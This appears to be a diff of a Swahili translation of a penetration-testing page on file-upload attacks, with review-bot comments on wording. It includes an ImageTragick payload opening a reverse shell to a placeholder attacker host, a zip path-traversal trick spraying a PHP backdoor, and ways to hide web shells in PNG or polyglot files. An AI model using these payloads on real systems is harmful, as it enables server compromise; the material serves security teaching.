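Review bot: the new heading "Kunyanyasa compression kwa file spraying" uses "kunyanyasa", which in Swahili means harassing a person; the rest of this same diff renders "abuse" of a feature as "kutumika vibaya" (see the decompression paragraph above), so "Kutumia compression vibaya kwa file spraying" would be consistent. The added word "variable" before `$_REQUEST` in step 1 is an improvement over the old line.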
@ -299,14 +299,14 @@ system($cmd);
}?>
```
2. **File Spraying and Compressed File Creation**: Faili nyingi zimetengenezwa na archive ya zip imeundwa ikijumuisha faili hizi.
2. **File Spraying and Compressed File Creation**: Faili nyingi zinaundwa na archive ya zip inatengenezwa ikiwa na faili hizi.
```bash
root@s2crew:/tmp# for i in `seq 1 10`;do FILE=$FILE"xxA"; cp simple-backdoor.php $FILE"cmd.php";done
root@s2crew:/tmp# zip cmd.zip xx*.php
```
3. **Modification with a Hex Editor or vi**: Majina ya faili ndani ya zip hubadilishwa kwa kutumia vi au hex editor, kubadilisha "xxA" kuwa "../" ili kuvuka direktori.
3. **Modification with a Hex Editor or vi**: Majina ya faili ndani ya zip yamebadilishwa kwa kutumia vi au hex editor, kubadilisha "xxA" kuwa "../" ili kupita kwenye saraka.
```bash
:set modifiable
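Review bot: steps 2 and 3 keep their bold headings in English ("File Spraying and Compressed File Creation", "Modification with a Hex Editor or vi") while step 1's heading was translated to "Kuunda PHP Shell"; the three step headings should follow one convention. The block that starts with `:set modifiable` holds vi ex-commands, not a shell session, so the ```bash tag on that fence is misleading; ```vim or an untagged fence would be accurate.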
@ -316,48 +316,48 @@ root@s2crew:/tmp# zip cmd.zip xx*.php
## ImageTragic
Pakia yaliyomo haya kwa ugani wa image ili kutumia udhaifu **(ImageMagick , 7.0.1-1)** (kutokana na [exploit](https://www.exploit-db.com/exploits/39767))
Pakia yaliyomo haya kwa extension ya image ili ku-exploit udhaifu **(ImageMagick , 7.0.1-1)** (form the [exploit](https://www.exploit-db.com/exploits/39767))
```
push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)'
pop graphic-context
```
## Kuingiza PHP shell kwenye PNG
## Kuingiza PHP Shell kwenye PNG
Kuingiza PHP shell ndani ya IDAT chunk ya faili la PNG kunaweza kupita kwa ufanisi baadhi ya michakato ya usindikaji wa picha. Funsi za `imagecopyresized` na `imagecopyresampled` kutoka PHP-GD ni muhimu hasa katika muktadha huu, kwani kwa kawaida hutumika kwa resizing na resampling za picha, mtawalia. Uwezo wa PHP shell iliyowekwa kubaki bila kuathiriwa na shughuli hizi ni faida kubwa kwa matumizi fulani.
Kuingiza PHP shell katika chunk ya IDAT ya faili ya PNG kunaweza kuepuka kwa ufanisi baadhi ya operesheni za usindikaji wa picha. Funguo za `imagecopyresized` na `imagecopyresampled` kutoka PHP-GD zina umuhimu maalum katika muktadha huu, kwani hutumika mara kwa mara kwa kupima upya na resampling picha, kwa mtiririko huo. Uwezo wa PHP shell iliyowekwa ndani ya kukaa bila kuathiriwa na operesheni hizi ni faida muhimu kwa matumizi fulani.
Uchambuzi wa kina wa mbinu hii, pamoja na metodología na matumizi yake yanayowezekana, unapatikana katika makala ifuatayo: ["Encoding Web Shells in PNG IDAT chunks"](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/). Rasilimali hii inatoa ufahamu mpana wa mchakato na athari zake.
Uchunguzi wa kina wa mbinu hii, ikijumuisha metodologia na matumizi yake yanayowezekana, umepangwa katika makala ifuatayo: ["Encoding Web Shells in PNG IDAT chunks"](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/). Rasilimali hii inatoa uelewa mpana wa mchakato na athari zake.
More information in: [https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)
Taarifa zaidi: [https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)
## Faili za polyglot
## Polyglot Files
Faili za polyglot hutumika kama chombo cha kipekee katika usalama wa mtandao, zikifanya kazi kama chameleons zinazoweza kuwepo kwa uhalali katika muundo kadhaa wa faili kwa wakati mmoja. Mfano wa kuvutia ni a [GIFAR](https://en.wikipedia.org/wiki/Gifar), mseto unaofanya kazi kama GIF na kama archive ya RAR. Faili za namna hii hazina kikomo kwa jozi hii pekee; mchanganyiko kama GIF na JS au PPT na JS pia yanawezekana.
Polyglot files hutumika kama chombo cha kipekee katika cybersecurity, zikifanya kazi kama chameleon ambazo zinaweza kuwepo kwa uhalali katika miundo mbalimbali ya faili kwa wakati mmoja. Mfano wa kuvutia ni [GIFAR](https://en.wikipedia.org/wiki/Gifar), muunganiko ambao hufanya kazi kama GIF na pia kama archive ya RAR. Faili kama hizi hazikikwi kwa muunganisho huo pekee; mchanganyiko kama GIF na JS au PPT na JS pia yanawezekana.
Faida kuu ya faili za polyglot iko katika uwezo wao wa kupitisha hatua za usalama zinazochuja faili kulingana na aina. Mazoea ya kawaida katika programu mbalimbali ni kuruhusu aina maalum tu za faili kupakiwa—kama JPEG, GIF, au DOC—ili kupunguza hatari inayotokana na fomati zinazoweza kuwa hatari (kwa mfano, JS, PHP, au Phar). Hata hivyo, polyglot, kwa kufuata vigezo vya muundo vya aina nyingi za faili, inaweza kupita kwa siri kupitia vikwazo hivi.
Manufaa kuu ya polyglot files yako katika uwezo wao wa kukwepa hatua za usalama ambazo hupitia faili kulingana na aina. Katika matumizi ya kawaida, programu nyingi huruhusu aina maalum za faili tu kupakiwa—kama JPEG, GIF, au DOC—ili kupunguza hatari inayotokana na muundo hatari (mfano, JS, PHP, au Phar files). Hata hivyo, polyglot, kwa kuendana na vigezo vya muundo vya aina nyingi za faili, inaweza kuzipitia vikwazo hivi kwa kimyakimya.
Licha ya ufanisi wao, polyglots pia wana mipaka. Kwa mfano, ingawa polyglot inaweza kuonyesha kwa wakati mmoja faili ya PHAR (PHp ARchive) na JPEG, ufanisi wa kupakia inaweza kutegemea sera za extension za jukwaa. Ikiwa mfumo ni mkali kuhusu extensions zinazoruhusiwa, udualgawaji wa muundo wa polyglot peke yake unaweza kutokutosha kuhakikisha kupakiwa kwake.
Licha ya ufanifu wao, polyglots hukutana na mipaka. Kwa mfano, ingawa polyglot inaweza kwa wakati mmoja kuwa PHAR file (PHp ARchive) na JPEG, mafanikio ya upakiaji wake yanaweza kutegemea sera za jukwaa kuhusu extensions za faili. Ikiwa mfumo ni mkali kuhusu extensions zinazoruhusiwa, muundo wa pande mbili wa polyglot inaweza isitoshe kuhakikisha upakiaji wake.
More information in: [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a)
Taarifa zaidi: [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a)
### Kupakia JSON sahihi ikionekana kama PDF
### Kupakia JSON halali kana kwamba ni PDF
Jinsi ya kuepuka ugundaji wa aina za faili kwa kupakia faili halali ya JSON hata ikiwa haikuruhusiwa kwa kuigiza PDF (techniques from **[this blog post](https://blog.doyensec.com/2025/01/09/cspt-file-upload.html)**):
Jinsi ya kuepuka utambuzi wa aina za faili kwa kupakia faili ya JSON halali hata kama haikuruhusiwa kwa kuigiza kuwa ni faili ya PDF (techniques from **[this blog post](https://blog.doyensec.com/2025/01/09/cspt-file-upload.html)**):
- **`mmagic` library**: Mradi tu `%PDF` magic bytes ziko katika 1024 bytes za mwanzo inachukuliwa kuwa halali (pata mfano kutoka kwenye post)
- **`pdflib` library**: Ongeza muundo wa PDF wa bandia ndani ya field ya JSON ili library ifikiri ni PDF (pata mfano kutoka kwenye post)
- **`file` binary**: Inaweza kusoma hadi 1048576 bytes kutoka kwa faili. Tengeneza JSON kubwa kuliko hiyo ili isiweze kuchambua maudhui kama json na kisha ndani ya JSON weka sehemu ya mwanzo ya PDF halisi na itafikiri ni PDF
- **`mmmagic` library**: Iwapo tu magic bytes za `%PDF` ziko katika bytes za kwanza 1024 basi inachukuliwa kuwa halali (angalia mfano kwenye post)
- **`pdflib` library**: Ongeza muundo wa PDF bandia ndani ya field ya JSON ili library ithink ni pdf (angalia mfano kwenye post)
- **`file` binary**: Inaweza kusoma hadi 1048576 bytes kutoka kwa faili. Unda JSON kubwa zaidi ya hiyo ili isiweze kuchambua maudhui kama json, kisha ndani ya JSON weka sehemu ya mwanzo ya PDF halisi na itadhani ni PDF
## Marejeleo
- [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20insecure%20files](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20insecure%20files)
- [https://github.com/modzero/mod0BurpUploadScanner](https://github.com/modzero/mod0BurpUploadScanner)
- [https://github.com/almandin/fuxploider](https://github.com/almandin/fuxploider)
- [https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html)
- [https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)
- [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a)
- [https://blog.doyensec.com/2025/01/09/cspt-file-upload.html](https://blog.doyensec.com/2025/01/09/cspt-file-upload.html)
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20insecure%20files
- https://github.com/modzero/mod0BurpUploadScanner
- https://github.com/almandin/fuxploider
- https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html
- https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/
- https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a
- https://blog.doyensec.com/2025/01/09/cspt-file-upload.html
- [The Art of PHP: CTFborn exploits and techniques](https://blog.orange.tw/posts/2025-08-the-art-of-php-ch/)
- [CVE-2024-21546 NVD entry](https://nvd.nist.gov/vuln/detail/CVE-2024-21546)
- [PoC gist for LFM .php. bypass](https://gist.github.com/ImHades101/338a06816ef97262ba632af9c78b78ca)
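Review bot: the new ImageTragick line introduces a typo and an untranslated fragment, "(form the [exploit](…))", where the removed line had the correct Swahili "(kutokana na …)"; it should read "from" or keep the original wording. In the PNG section, "Funguo za `imagecopyresized` na `imagecopyresampled`" translates "functions" as "keys"; "vitendakazi" (or keeping "functions") is the intended sense. In the references list, the rewritten entries drop the `[url](url)` markdown link form while the three unchanged entries at the end keep it, so the list now mixes two styles; either convert all entries or leave the link form in place.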